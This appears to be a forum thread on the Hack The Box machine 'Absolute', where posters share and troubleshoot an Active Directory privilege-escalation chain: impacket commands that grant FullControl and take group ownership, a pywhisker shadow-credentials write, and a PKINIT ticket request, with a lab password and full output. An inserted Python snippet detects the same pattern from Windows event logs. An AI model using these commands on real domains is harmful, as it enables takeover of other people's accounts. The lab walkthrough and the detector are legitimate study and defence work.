Absolute - HTB [Discussion]
hmm.. try to get root
Reply
(October 22, 2022, 07:23 AM) user_htb22 Wrote:
(October 22, 2022, 06:44 AM) Cipher Wrote: pywhisker.py -d absolute.htb -u "m.lovegod" -k --no-pass -t "winrm_user" --action "add"

[*] Searching for the target account
[*] Target user found: CN=winrm_user,CN=Users,DC=absolute,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 2c215242-7760-b763-042c-6331a46961e3
[*] Updating the msDS-KeyCredentialLink attribute of winrm_user
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514A0, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0

Linux version

```bash
> impacket-getTGT absolute.htb/m.lovegod:AbsoluteLDAP2022!
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Saving ticket in m.lovegod.ccache

> export KRB5CCNAME=m.lovegod.ccache

# Modify group rights to all
> impacket-dacledit absolute.htb/m.lovegod:AbsoluteLDAP2022! -k  -target-dn 'DC=absolute,DC=htb' -dc-ip 10.10.11.181 -action write -rights FullControl -principal 'm.lovegod' -target 'Network Audit'
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[*] DACL backed up to dacledit-20221001-005328.bak
[*] DACL modified successfully!


# Add user to group
> impacket-owneredit  -k absolute.htb/m.lovegod:AbsoluteLDAP2022! -dc-ip 10.10.11.181 -action write -new-owner 'm.lovegod'  -target 'Network Audit'
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[*] Current owner information below
[*] - SID: S-1-5-21-4078382237-1492182817-2568127209-1109
[*] - sAMAccountName: m.lovegod
[*] - distinguishedName: CN=m.lovegod,CN=Users,DC=absolute,DC=htb
[*] OwnerSid modified successfully!


# Check if user has been added
> impacket-dacledit absolute.htb/m.lovegod:AbsoluteLDAP2022! -k  -target-dn 'DC=absolute,DC=htb' -dc-ip 10.10.11.181 -action read -principal 'm.lovegod' -target 'Network Audit'
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-4078382237-1492182817-2568127209-1109)
[*]   ACE[4] info               
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : None
[*]     Access mask               : FullControl (0xf01ff)
[*]     Trustee (SID)             : m.lovegod (S-1-5-21-4078382237-1492182817-2568127209-1109)
```

Get a pfx file and the password associated with it using [pywhisker.py](https://github.com/ShutdownRepo/pywhisker):
```bash
> impacket-getTGT absolute.htb/m.lovegod:AbsoluteLDAP2022!
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Saving ticket in m.lovegod.ccache

> export KRB5CCNAME=m.lovegod.ccache

> pywhisker -d absolute.htb -u "m.lovegod" -k  -t "winrm_user" --action "add"  --dc-ip 10.10.11.181
[*] Searching for the target account
[*] Target user found: CN=winrm_user,CN=Users,DC=absolute,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 3a646e2b-da2c-6bc5-6716-29219b234274
[*] Updating the msDS-KeyCredentialLink attribute of winrm_user
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: aVyJ6kyU.pfx
[*] Must be used with password: 5Js2StgOCcksYbL6mujS
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
```

Using PKINITtools to get a ticket from the pfx file as follows:
```bash
> gettgtpkinit absolute.htb/winrm_user -cert-pfx aVyJ6kyU.pfx -pfx-pass 5Js2StgOCcksYbL6mujS winrm_user.ccache
2022-10-01 04:02:38,634 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2022-10-01 04:02:38,650 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2022-10-01 04:03:03,267 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2022-10-01 04:03:03,268 minikerberos INFO     f03aa48a1fd1f4855630bdc817105408373be6baa60939f3adf4160bbd704d89
INFO:minikerberos:f03aa48a1fd1f4855630bdc817105408373be6baa60939f3adf4160bbd704d89
2022-10-01 04:03:03,276 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file


```

Any ideas why this isn't playing ball? Whatever I do, I always get the "INSUFF_ACCESS_RIGHTS" on the last command.

```bash
python3 impacket/examples/dacledit.py absolute.htb/m.lovegod:AbsoluteLDAP2022! -k -target-dn 'DC=absolute,DC=htb' -dc-ip 10.129.x.x -action write -rights FullControl -principal 'm.lovegod' -target 'Network Audit'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] DACL backed up to dacledit-20221122-070823.bak
[*] DACL modified successfully!

python3 impacket/examples/owneredit.py  -k absolute.htb/m.lovegod:AbsoluteLDAP2022! -dc-ip 10.129.x.x -action write -new-owner 'm.lovegod'  -target 'Network Audit'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Current owner information below
[*] - SID: S-1-5-21-4078382237-1492182817-2568127209-1109
[*] - sAMAccountName: m.lovegod
[*] - distinguishedName: CN=m.lovegod,CN=Users,DC=absolute,DC=htb
[*] OwnerSid modified successfully!

python3 impacket/examples/dacledit.py absolute.htb/m.lovegod:AbsoluteLDAP2022! -k -target-dn 'DC=absolute,DC=htb' -dc-ip 10.129.x.x -action read -principal 'm.lovegod' -target 'Network Audit'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-4078382237-1492182817-2568127209-1109)
[*]   ACE[4] info
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : None
[*]     Access mask               : FullControl (0xf01ff)
[*]     Trustee (SID)             : m.lovegod (S-1-5-21-4078382237-1492182817-2568127209-1109)

getTGT.py "absolute.htb/m.lovegod:AbsoluteLDAP2022!"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Saving ticket in m.lovegod.ccache

export KRB5CCNAME=m.lovegod.ccache

python3 /opt/pywhisker/pywhisker.py -d ABSOLUTE.HTB -u "m.lovegod" -k --no-pass -t "winrm_user" --action "add" --dc-ip 10.129.x.x
[*] Searching for the target account
[*] Target user found: CN=winrm_user,CN=Users,DC=absolute,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: e558bb9c-1e09-0734-892a-75764dd7a283
[*] Updating the msDS-KeyCredentialLink attribute of winrm_user
[!] Could not modify object, the server reports insufficient rights: 00002098: SecErr: DSID-031514A0, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0
```
Reply
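Added example, not part of any post in this thread: on the defending side, the sequence shown above (a security-descriptor change on a group, a write to msDS-KeyCredentialLink on a user, then a certificate-based TGT request for that user) can be correlated from directory-change events (5136) and Kerberos TGT events (4768). It assumes directory service change auditing is enabled with a SACL covering these objects and that events are exported as flat records; the sample events, the group DN and the `allowed_writers` parameter are constructed for illustration.

```python
from datetime import datetime, timedelta

KEYCRED = "msDS-KeyCredentialLink"
SECDESC = "nTSecurityDescriptor"
PKINIT = "16"  # PreAuthType logged by event 4768 for certificate (PKINIT) pre-auth

# Constructed sample records (not from the thread), shaped like flattened
# Security-log exports of events 5136 and 4768. The group DN is assumed.
SAMPLE_EVENTS = [
    {"EventID": 5136, "Time": "2022-10-01T03:53:28", "SubjectUserName": "m.lovegod",
     "ObjectDN": "CN=Network Audit,CN=Users,DC=absolute,DC=htb",
     "AttributeLDAPDisplayName": SECDESC},
    {"EventID": 5136, "Time": "2022-10-01T04:01:10", "SubjectUserName": "m.lovegod",
     "ObjectDN": "CN=winrm_user,CN=Users,DC=absolute,DC=htb",
     "AttributeLDAPDisplayName": KEYCRED},
    {"EventID": 4768, "Time": "2022-10-01T04:03:03", "TargetUserName": "winrm_user",
     "PreAuthType": "16"},
    {"EventID": 4768, "Time": "2022-10-01T04:05:00", "TargetUserName": "m.lovegod",
     "PreAuthType": "2"},
]

def first_cn(dn):
    # First RDN value; treating it as the account name is an assumption
    # that holds for these samples but not for every directory object.
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def detect(events, allowed_writers=frozenset(), window=timedelta(hours=1)):
    """Return (severity, message) findings for the write-then-PKINIT pattern."""
    findings, key_writes = [], {}
    for ev in sorted(events, key=lambda e: e["Time"]):
        when = datetime.fromisoformat(ev["Time"])
        if ev["EventID"] == 5136:
            attr, who = ev["AttributeLDAPDisplayName"], ev["SubjectUserName"].lower()
            if attr not in (KEYCRED, SECDESC) or who in allowed_writers:
                continue  # unrelated attribute, or an expected writer (e.g. a sync account)
            target = first_cn(ev["ObjectDN"])
            if attr == KEYCRED:
                key_writes[target] = (when, who)
                findings.append(("medium", f"{who} wrote {KEYCRED} on {target}"))
            else:
                findings.append(("low", f"{who} changed the security descriptor of {target}"))
        elif ev["EventID"] == 4768 and ev.get("PreAuthType") == PKINIT:
            target = ev["TargetUserName"].lower()
            hit = key_writes.get(target)
            if hit and when - hit[0] <= window:
                findings.append(("high", f"PKINIT TGT for {target} after key write by {hit[1]}"))
    return findings

if __name__ == "__main__":
    for severity, message in detect(SAMPLE_EVENTS):
        print(f"[{severity}] {message}")
```

The allowlist matters in practice: accounts that legitimately write key credentials (device registration, directory sync) would otherwise produce a steady stream of medium findings.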
(September 26, 2022, 09:19 PM) ThatUsername Wrote:
(September 25, 2022, 06:03 PM) jahman Wrote: Hello,

Via BloodHound: m.lovegod -- OWNS --> Group Network Audit -- Generic Write --> winrm_user

How did you collect the data? With every version of the BloodHound ingestor I ran into a "Failure to authenticate with LDAP". Using  and his password.

Bloodhound.py | Sharphound.ps1 | Sharphound.exe

is failing.

 Thanks
Reply
(September 29, 2022, 12:37 PM) ThatUsername Wrote: Sure,

On my WinRM session I uploaded these files


files check xD
Reply
(September 29, 2022, 12:37 PM)ThatUsername Wrote: awd
Reply

